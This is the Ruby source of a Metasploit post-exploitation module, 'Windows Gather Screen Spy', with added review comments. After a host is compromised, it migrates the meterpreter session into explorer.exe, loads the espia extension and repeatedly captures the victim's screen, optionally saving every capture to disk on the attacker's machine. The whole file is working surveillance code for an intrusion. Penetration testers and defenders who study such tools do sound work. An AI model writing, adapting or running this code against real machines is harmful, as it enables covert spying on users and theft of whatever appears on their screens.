##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rbconfig'
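# Post module that repeatedly grabs the target's screen through the
# meterpreter "espia" extension and shows each capture in a viewer on the
# Metasploit host. Captures are written below <install_root>/data/.
#
# Target-side footprint of a run is the migration into explorer.exe
# (migrate_explorer) followed by loading the espia extension.
class Metasploit3 < Msf::Post

	# Module metadata and options.
	#
	# @param info [Hash] module info merged by update_info
	def initialize(info={})
		super( update_info(info,
			'Name'          => 'Windows Gather Screen Spy',
			'Description'   => %q{
				This module will incrementally take screenshots of the meterpreter host. This
				allows for screen spying which can be useful to determine if there is an active
				user on a machine, or to record the screen for later data extraction.
			},
			'License'       => MSF_LICENSE,
			'Author'        =>
				[
					'Roni Bachar <roni.bachar.blog[at]gmail.com>', # original meterpreter script
					'bannedit', # post module
					'kernelsmith <kernelsmith /x40 kernelsmith /x2E com>', # record support
					'Adrian Kubok' # better record file names
				],
			'Version'       => '$Revision$',
			'Platform'      => ['windows'],
			'SessionTypes'  => ['meterpreter']
		))

		register_options(
			[
				OptInt.new('DELAY', [false, 'Interval between screenshots in seconds', 5]),
				OptInt.new('COUNT', [false, 'Number of screenshots to collect', 60]),
				OptString.new('BROWSER', [false, 'Browser to use for viewing screenshots', 'firefox']),
				OptBool.new('RECORD', [false, 'Record all screenshots to disk',false])
			], self.class)
	end

	# Module entry point.
	#
	# Migrates into explorer.exe, loads espia, then takes COUNT captures DELAY
	# seconds apart. Each capture overwrites the working file
	# <install_root>/data/<host>.jpg, which is opened in the local viewer and
	# removed when the run ends; with RECORD set every capture is also kept as
	# <install_root>/data/<host>.screenshot.NNN.jpg, zero-padded so the files
	# sort in capture order.
	#
	# @return [void] returns early (after print_error) on an unsupported
	#   session platform, a failed espia load, invalid COUNT/DELAY, or any
	#   error raised while capturing
	def run
		# NOTE(review): assumes the peer is "ip:port" (IPv4); an IPv6 peer
		# would be truncated at its first colon.
		host = session.tunnel_peer.split(':')[0]
		screenshot = ::File.join(Msf::Config.install_root, 'data', "#{host}.jpg")

		migrate_explorer

		if session.platform !~ /win32|win64/i
			print_error("Unsupported Platform")
			return
		end

		begin
			session.core.use("espia")
		rescue ::Exception => e
			# NOTE(review): kept as ::Exception on purpose - some Rex errors
			# (timeouts) do not descend from StandardError.
			print_error("Failed to load espia extension (#{e.to_s})")
			return
		end

		count = datastore['COUNT'].to_i
		delay = datastore['DELAY'].to_i
		# Math.log(0) used to blow up inside the capture loop; reject bad
		# values up front instead.
		if count <= 0 || delay < 0
			print_error("COUNT must be greater than zero and DELAY must not be negative")
			return
		end

		viewer = viewer_command(screenshot)
		unless viewer
			print_status("No viewer known for this local platform, captures will not be displayed")
		end

		begin
			print_status "Capturing %u screenshots with a delay of %u seconds" % [count, delay]
			# digits needed for the largest index (count - 1) so RECORD file
			# names get a consistent zero-padded width
			width = (count - 1).to_s.length
			count.times do |num|
				select(nil, nil, nil, delay) # portable sleep
				data = session.espia.espia_image_get_dev_screen
				next unless data

				if datastore['RECORD']
					# persistent, non-clobbering copy of this capture
					shot = ::File.join(Msf::Config.install_root, 'data',
						"#{host}.screenshot.%0#{width}d.jpg" % num)
					write_image(shot, data)
				end

				write_image(screenshot, data)
				system(*viewer) if viewer
			end
		rescue ::Exception => e
			# NOTE(review): kept as ::Exception on purpose - see espia load above.
			print_error("Error taking screenshot: #{e.class} #{e} #{e.backtrace}")
			return
		end

		print_status("Screen Spying Complete")
		# the working file only exists if at least one capture returned data
		::File.delete(screenshot) if ::File.exist?(screenshot)
	end

	# Move the session into explorer.exe before capturing. Presumably this is
	# so the capture runs in the interactive user's process - the original
	# gives no reason, confirm if it matters. Does nothing when the session
	# already lives in explorer.exe or no explorer.exe is listed; a failed
	# migration is reported and the session is left where it is.
	#
	# @return [void]
	def migrate_explorer
		pid = session.sys.process.getpid
		procs = session.sys.process.get_processes

		# already there, nothing to do
		return if procs.any? { |p| p['pid'] == pid && p['name'] == 'explorer.exe' }

		target = procs.find { |p| p['name'] == 'explorer.exe' }
		return unless target

		print_status("Migrating to explorer.exe pid: #{target['pid']}")
		begin
			session.core.migrate(target['pid'].to_i)
			print_status("Migration successful")
		rescue ::StandardError
			print_status("Migration failed.")
		end
	end

	private

	# Build the argv used to open the working screenshot on the Metasploit
	# host, chosen by the platform Metasploit itself runs on (RbConfig host
	# string). BROWSER is taken from the datastore and passed as one argv
	# element rather than interpolated into a shell string, so paths with
	# spaces or shell metacharacters in install_root are handled.
	#
	# @param path [String] local path of the working screenshot
	# @return [Array<String>, nil] nil when the local platform is not recognised
	def viewer_command(path)
		url = "file://#{path}"
		case RbConfig::CONFIG['host']
		when /ming/
			# 'start' is a cmd.exe builtin, so it has to be run through cmd
			['cmd', '/c', 'start', datastore['BROWSER'], url]
		when /linux/
			[datastore['BROWSER'], url]
		when /apple/
			['open', url] # hands the file to the default viewer (Preview)
		end
	end

	# Write one capture to disk; the block form closes the handle even if
	# the write raises.
	#
	# @param path [String] destination path
	# @param data [String] image bytes returned by espia
	# @return [void]
	def write_image(path, data)
		::File.open(path, 'wb') { |fd| fd.write(data) }
	end
end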